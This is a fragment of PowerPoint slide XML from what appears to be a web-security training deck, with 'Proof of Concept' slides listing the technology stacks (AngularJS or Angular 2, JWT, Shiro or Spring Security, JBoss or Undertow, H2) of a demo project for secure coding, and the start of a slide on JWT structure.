              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Proof of Concept</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Most of the mitigations/protections described </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>used in our project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>hosted in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>gitlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>project is used to illustrate best practices in Web security for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>AngularJS </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Technical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>stack :    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>[Web Framework] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(1.6.x)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[OAuth] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>(nimbus-jose-jwt-4.33</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Authorization] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>1.2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>Sdco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>-security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> module (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> integration for AngularJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[REST API] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTEasy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>JAX-RS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Backend] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>JEE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> (JPA 2, CDI 1.0, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Application Server] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (EAP-6.4.0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Database] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>H2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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9712" y="771550"/>
            <a:ext cx="1050469" cy="280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992185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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6076984" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Proof of Concept</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Most of the mitigations/protections described </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>used in our project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>hosted in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>gitlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>project is used to illustrate best practices in Web security for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Angular </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>Technical stack :    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Web Framework] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Angular 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[OAuth]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (jjwt-0.7.x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (4.x), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>-boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Authentication, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Autorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> &amp; Security] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>-security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (4.1.x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[REST API] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>-web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (4.3.x)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Web Server] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Undertow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (1.4.x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>In-memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>, Flat files, H2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ysql</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Generator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>JHipster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>(1.0.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>[Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>oding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>edicated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>git branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> protection – Full implementation on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>branch master</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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454" y="792816"/>
            <a:ext cx="792088" cy="234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80432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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Structure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>a JWT typically looks like the following in its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>JWS compact serialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="539750" lvl="2" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
